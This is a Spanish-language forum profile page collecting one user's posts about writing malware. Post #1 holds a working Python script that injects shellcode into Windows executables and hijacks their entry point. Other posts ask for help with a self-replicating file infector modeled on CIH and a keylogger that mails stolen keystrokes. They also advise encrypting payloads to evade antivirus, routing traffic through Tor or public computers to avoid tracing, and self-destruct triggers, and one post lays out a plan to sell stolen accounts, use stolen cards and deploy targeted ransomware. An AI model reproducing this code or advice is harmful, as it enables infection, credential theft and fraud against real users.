Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el etrno

#1
actualización cree un programa que hace lo que dijefrom pefile import PE
from struct import pack

sample_shell_code = ("\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64" +
"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e" +
"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60" +
"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b" +
"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01" +
"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d" +
"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01" +
"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" +
"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89" +
"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45" +
"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff" +
"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64" +
"\x68\x75\x73\x65\x72\x88\x5c\x24\x0a\x89\xe6\x56\xff\x55" +
"\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24\x52\xe8" +
"\x61\xff\xff\xff\x68\x21\x58\x20\x20\x68\x57\x30\x30\x74" +
"\x31\xdb\x88\x5c\x24\x05\x89\xe3\x68\x65\x21\x58\x20\x68" +
"\x20\x48\x65\x72\x68\x20\x57\x61\x73\x68\x73\x69\x73\x68" +
"\x68\x44\x65\x62\x61\x31\xc9\x88\x4c\x24\x12\x89\xe1\x31" +
"\xd2\x52\x53\x51\x52\xff\xd0")
if __name__ == '__main__':
exe_file = input('[*] Ingrese la ruta completa del ejecutable principal:')
final_pe_file = input('[*] Ingrese la ruta completa del ejecutable de salida:')
pe = PE(exe_file)
OEP = pe.OPTIONAL_HEADER.AddressOfEntryPoint
pe_sections = pe.get_section_by_rva(pe.OPTIONAL_HEADER.AddressOfEntryPoint)
align = pe.OPTIONAL_HEADER.SectionAlignment
what_left = (pe_sections.VirtualAddress + pe_sections.Misc_VirtualSize) - pe.OPTIONAL_HEADER.AddressOfEntryPoint
end_rva = pe.OPTIONAL_HEADER.AddressOfEntryPoint + what_left
padd = align - (end_rva % align)
e_offset = pe.get_offset_from_rva(end_rva+padd) - 1
scode_size = len(sample_shell_code)+7
if padd < scode_size:
    # No hay suficiente espacio disponible para shellcode
exit()
# El código se puede inyectar
scode_end_off = e_offset
scode_start_off = scode_end_off - scode_size
pe.OPTIONAL_HEADER.AddressOfEntryPoint = pe.get_rva_from_offset(scode_start_off)
raw_pe_data = pe.write()
jmp_to = OEP - pe.get_rva_from_offset(scode_end_off)
sample_shell_code = '\x60%s\x61\xe9%s' % (sample_shell_code, pack('I', jmp_to & 0xffffffff))
final_data = list(raw_pe_data)
final_data[scode_start_off:scode_start_off+len(sample_shell_code)] = sample_shell_code
final_data = ''.join(final_data)
raw_pe_data = final_data
pe.close()
new_file = open(final_pe_file, 'wb')
new_file.write(raw_pe_data)
new_file.close()
print ('[*] Trabajo terminado! :)')

lo escribí en Python 2 y lo estoy pasando a Python 3 probablemente tenga problemas es casi seguro que ahora mismo tenga código que solo funciona en Python 2 si notan alguna me avisan además no estoy seguro de si sirve en ejecutables de 64 bits en resumen este programa hace: 1 busca si el ejecutable tiene el espacio para el shellcode 2 si el espacio es insuficiente responde espacio insuficiente si el espacio es suficiente 3 modifica el ejecutable para que al usarlo se ejecute el shellcode.
en resumen solo convierte tu virus a un .exe y ya tienes tu shellcode la razón por la que no lo e hecho auto replicante aun es que no quiero problemas con mis archivos pero estoy seguro de que averiguaran como hacerlo solo se necesita un poco de ingenio  ;-) ahora no e dormido en casi una semana y estoy asta los huevos de esta mier*a  >:D, pero aun no termino voy a crear uno que use fuerza bruta y a reparar el código espero que me ayuden a pasar esta cosa a Python 3
#2
Simplemente ofusca el código (básicamente cifrar el código fuente) otra opción es que tomes el binario y crees un programa en Python con la llave privada que al ejecutarse desencripte y ejecute el binario malicioso la ventaja de esto es que es una forma fácil pero primitiva y no 100% efectiva de ocultar el proceso (lo ocultara de defender pero no de una inspección rápida del gestor de tareas porque sigue existiendo un proceso que no debería).
Note 2 problemas en tu código el primero es que no tienes nada que permita la persistáis y segundo es que nada impide que rastreen tu ip cuando te conectes (y no estoy seguro de si funciona fuera de una red local y seria un grabe problema por limitar el al una red con todos  los problemas que eso implica) 
#3
gracias estoy haciendo experimentos para crear un servidor y que las victimas se conecten pero no estoy seguro de como hacerlo irrastreable actualizare cundo tenga algo mas avanzado
#4
No me contradigo solo no me explique bien el código debe ser de python 3 (mas por comodidad que otra cosa) pero lo voy a compila para crear un ejecutable .exe (un ejecutable portable o PE) con lo de no usar programas externos me refiero a no requerir que la victima instale nada (aparte del propio virus claro) toda la información que e encontrado es de como usar un programa X para infectar un ejecutable con mi virus no de como hace que mi virus sea el que infecta los archivos. Estoy haciendo experimentos por mi parte pero no estoy acostumbrado a los archivos ejecutables de windows (suelos usar linux para casi todo por lo que solo es falta de costumbre)
#5
estoy trabajando en un proyecto y tome inspiración del virus cih concreta mente su método de propagación el propósito es que le virus modifique todos los archivos .exe para que si se ejecuta en otra maquina esta queda infectada causando una propagación efectiva se que la librería PEFile da herramientas para modificar ejecutable pero no se haya información de lo que quiero hacer por eso pregunto si alguien sabe como hacerlos los parámetros son: permitir infectar los archivos .exe para que el virus se propague, no requerir de instalar programas externos tiene que poder funciona en una maquina infectada para continuar la propagación, estar escrito en python 3. agradezco cualquier ayuda
#6
estoy teniendo problemas con un keylogger se supone que debe enviarme los datos que capture por correo electrónico el problema es que toda la información recure al uso de la librería smtplib estoy usando python 3 y el código siempre recure a gmail sobra decir porque dar una cuenta de gmail a un virus es una idea oribe como solución que halle fue usar el servisio de coreo tutanota el problema es que no se como hacer para que mi programa mande la información usando tutanota en lugar de gmail. normalmente intentaría adaptar este código:
import smtplib
server = smtplib.SMTP("smtp.gmail.com", 587)
server.ehlo()
server.starttls()
server.ehlo()
server.login("usuario", "1234")
msg = "datos"
server.sendmail("prueba1@gmail.com", "prueba2@gmail.com", msg)
server.quit()

y luego lo refinaría pero cada ves que toco algo aparecen 10 errores, ni siquiera estoy seguro de si el modulo smtplib sirve para esto y en internen no e encontrado información
agradecería cualquier ayuda esto se esta convirtiendo en un dolor de cabeza enorme.  
#7
literalmente cualquier lenguaje de paronomasia es balido pero si quieres hacer que el desarrollo sea divertido usa un lenguaje esotérico son tan raros que ciertamente sera una experiencia única
#8
la manera mas rentable que se me ocurre es crear un keyloger recolectar información varia y vender las cuentas ademas usar las tarjetas de crédito para compra monero (una criptomoneda irretractable) de paso toma la ip de la victima y usa su contraseña para entrar a su pc (especialmente útil en bancos) como extra podría darle la capacidad de descargar ransonware dirigido de ese modo mi código jamas esta en la memoria y solo ataco blancos útiles que vallan a pagar el rescate y puedo dejar al resto como vectores de infecciona y lo mejor de todo es que decir tu plan en vos alta en un foro de interne te da la escusa de no puedes probar que fui yo y existen miles de personas que podrian copiarme no saves quien hizo que eso es para mi la forma mas rentable de usar malware  :rolleyes:
#9
depende es de conexión directa o inversa?
si es directa has pasar el trafico por la red tor.
si es inversa pon un intermediario como un servidor o una pc que controles recomiendo un equipo publico como el de una biblioteca en este solo instala un programa que te reenviare el trafico de la victima y que envié tu trafico a la victima
como extra cifra el codigo y programa el virus para que si en x tiempo no te conectas se auto-destruya y si tratan de detener su poseso se auto-destruya
#10
define camuflar, con lo que dieses solo puedo responder encripra el código y que se desencripte al ejecutarse